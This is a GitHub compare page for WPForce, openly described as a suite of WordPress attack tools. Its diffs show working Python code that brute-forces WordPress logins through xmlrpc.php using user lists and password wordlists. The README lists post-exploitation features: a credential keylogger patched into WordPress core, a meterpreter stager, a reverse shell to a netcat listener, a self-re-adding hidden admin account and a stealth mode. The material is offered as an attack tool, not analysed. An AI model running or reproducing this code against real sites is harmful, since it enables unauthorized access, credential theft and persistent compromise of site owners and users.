Skip to content
Permalink

Comparing changes

Choose two branches to see what’s changed or to start a new pull request. If you need to, you can also or learn more about diff comparisons.

Open a pull request

Create a new pull request by comparing changes across two branches. If you need to, you can also . Learn more about diff comparisons here.
base repository: n00py/WPForce
Failed to load repositories. Confirm that selected base ref is valid, then try again.
Loading
base: v.1.0.0
Choose a base ref
...
head repository: n00py/WPForce
Failed to load repositories. Confirm that selected head ref is valid, then try again.
Loading
compare: master
Choose a head ref
  • 18 commits
  • 3 files changed
  • 3 contributors

Commits on Jun 18, 2017

  1. Added more verbose error output when CSRF token is not found

    @n00py
    n00py committed Jun 18, 2017
    Copy the full SHA
    5256373 View commit details

Commits on Aug 9, 2017

  1. Update README.md 

    Added blog posts written in other languages
    @n00py
    n00py authored Aug 9, 2017
    Copy the full SHA
    6af19bf View commit details

  2. Update README.md

    @n00py
    n00py authored Aug 9, 2017
    Copy the full SHA
    2929229 View commit details

Commits on Aug 30, 2017

  1. Added persist module

    @n00py
    n00py committed Aug 30, 2017
    Copy the full SHA
    c4f40f5 View commit details

  2. Update README.md 

    Added persist module
    @n00py
    n00py authored Aug 30, 2017
    Copy the full SHA
    828cee0 View commit details

  3. Update yertle.py

    @n00py
    n00py authored Aug 30, 2017
    Copy the full SHA
    269aa9f View commit details

  4. Added a check to see if the PHP interpreter is php-cgi, if so aborts … 

    …some modules
    @n00py
    n00py committed Aug 30, 2017
    Copy the full SHA
    517daeb View commit details

  5. Merge remote-tracking branch 'origin/master' 

    # Conflicts:
#	yertle.py
    @n00py
    n00py committed Aug 30, 2017
    Copy the full SHA
    fcec0f5 View commit details

Commits on Jan 29, 2018

  1. Update README.md

    @n00py
    n00py authored Jan 29, 2018
    Copy the full SHA
    2964e6f View commit details

Commits on May 1, 2018

  1. Update README.md

    @n00py
    n00py authored May 1, 2018
    Copy the full SHA
    e69c6c7 View commit details

  2. Update README.md

    @n00py
    n00py authored May 1, 2018
    Copy the full SHA
    aa4628e View commit details

  3. Update README.md

    @n00py
    n00py authored May 1, 2018
    Copy the full SHA
    179f5e5 View commit details

Commits on Jul 11, 2018

  1. First attempt to add users from cli and minor fixes in file handling

    @s3gm3nt4ti0nf4ult
    s3gm3nt4ti0nf4ult committed Jul 11, 2018
    Copy the full SHA
    81fbf4b View commit details

  2. fixed list of users from cli

    @s3gm3nt4ti0nf4ult
    s3gm3nt4ti0nf4ult committed Jul 11, 2018
    Copy the full SHA
    3346264 View commit details

  3. mutually exclusive

    @s3gm3nt4ti0nf4ult
    s3gm3nt4ti0nf4ult committed Jul 11, 2018
    Copy the full SHA
    4a4459e View commit details

Commits on Jul 17, 2018

  1. Merge pull request #13 from s3gm3nt4ti0nf4ult/master 

    Users list initial feature
    @n00py
    n00py authored Jul 17, 2018
    Copy the full SHA
    b1c1359 View commit details

Commits on Jul 30, 2018

  1. Added check for Yertle when connecting to an existing shell

    @n00py
    n00py committed Jul 30, 2018
    Copy the full SHA
    31024e0 View commit details

Commits on Feb 16, 2021

  1. Update wpforce.py

    @n00py
    n00py authored Feb 16, 2021
    Copy the full SHA
    b72ec64 View commit details
Showing with 227 additions and 142 deletions.
  1. +19 −0 README.md
  2. +24 −11 wpforce.py
  3. +184 −131 yertle.py
19 changes: 19 additions & 0 deletions README.md
View file
Original file line number Diff line number Diff line change
@@ -6,6 +6,24 @@ WPForce is a suite of Wordpress Attack tools. Currently this contains 2 scripts

For more information, visit the blog post here:
https://www.n00py.io/2017/03/squeezing-the-juice-out-of-a-compromised-wordpress-server/

Blogs in other languages:

Chinese - www.mottoin.com/100381.html

Portuguese - http://www.100security.com.br/wpforce/

Spanish - http://www.1024megas.com/2017/05/wpforce-fuerzabruta-postexplotacion.html

https://esgeeks.com/como-hackear-sitio-wordpress-con-wpforce/

Russian - https://hackware.ru/?p=2547

French - https://securityhack3r.info/wpforce-brute-force-attack-tool-wordpress/

Turkish - http://turkhackteam.org/web-server-guvenligi/1655005-wordpress-site-sizma-testi-part-1-a.html


## FEATURES:
* Brute Force via API, not login form bypassing some forms of protection
* Can automatically upload an interactive shell
@@ -116,6 +134,7 @@ help Help menu
keylogger Patches WordPress core to log plaintext credentials
keylog Displays keylog file
meterpreter Executes a PHP meterpreter stager to connect to metasploit
persist Creates an admin account that will re-add itself
quit Terminate the session
shell Sends a TCP reverse shell to a netcat listener
stealth Hides Yertle from the plugins page
35 changes: 24 additions & 11 deletions wpforce.py
View file
Original file line number Diff line number Diff line change
@@ -1,9 +1,12 @@
import re
import sys
import time
import socket
import urllib2
import argparse
import threading
from urlparse import urljoin

__author__ = 'n00py'
# These variables must be shared by all threads dynamically
correct_pairs = {}
@@ -119,6 +122,7 @@ def TestSite(url):


def PasswordAttempt(user, password, url, thread_no,verbose,debug,agent):
global passlist
if verbose is True or debug is True:
if debug is True:
thready = "[Thread " + str(thread_no) + "]"
@@ -172,28 +176,37 @@ def PasswordAttempt(user, password, url, thread_no,verbose,debug,agent):


def protocheck(url):
if "http" not in url:
printout("Please include the protocol in the URL\n", YELLOW)
url_pattern = re.compile("http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+")
if not url_pattern.match(url):
printout("Incorrect URL. Please include the protocol in the URL.\n", YELLOW)
sys.exit()

def main():
parser = argparse.ArgumentParser(description='This is a tool to brute force Worpress using the Wordpress API')
parser.add_argument('-i','--input', help='Input file name',required=True)
users = parser.add_mutually_exclusive_group(required=True)
users.add_argument('-i','--input', help='Input file name')
users.add_argument('-si' '--singleinput', help='Input list of users', action='store', dest='singleinput', nargs='+')
parser.add_argument('-w','--wordlist',help='Wordlist file name', required=True)
parser.add_argument('-u','--url',help='URL of target', required=True)
parser.add_argument('-v','--verbose',help=' Verbose output. Show the attemps as they happen.', required=False, action='store_true')
parser.add_argument('-t','--threads',help=' Determines the number of threads to be used, default is 10', type=int, default=10, required=False)
parser.add_argument('-a','--agent',help=' Determines the user-agent', type=str, default="WPForce Wordpress Attack Tool 1.0", required=False)
parser.add_argument('-d','--debug',help=' This option is used for determining issues with the script.', action='store_true', required=False)
args = parser.parse_args()

url = args.url
if url.endswith('/'):
url = url[:-1]
url += '/xmlrpc.php'
u = open(args.input, 'r')
userlist = u.read().split('\n')
url = urljoin(url, 'xmlrpc.php')

if args.input:
userlist = open(args.input, 'r').read().split('\n')
else:
printout("Remember to pass usernames in space delimited form!\n", YELLOW)
userlist = args.singleinput

totalusers = len(userlist)
f = open(args.wordlist, 'r')
passlist = f.read().split('\n')

passlist = open(args.wordlist, 'r').read().split('\n')

PrintBanner(args.input,args.wordlist,args.url,userlist,passlist)
TestSite(url)

@@ -204,10 +217,10 @@ def main():
sys.stdout.flush()
percent = "%.0f%%" % (100 * (total)/len(passlist))
print " " + percent + " Percent Complete\r",

print "\nAll correct pairs:"
printout(str(correct_pairs), GREEN)
print ""

if __name__ == "__main__":

main()
Loading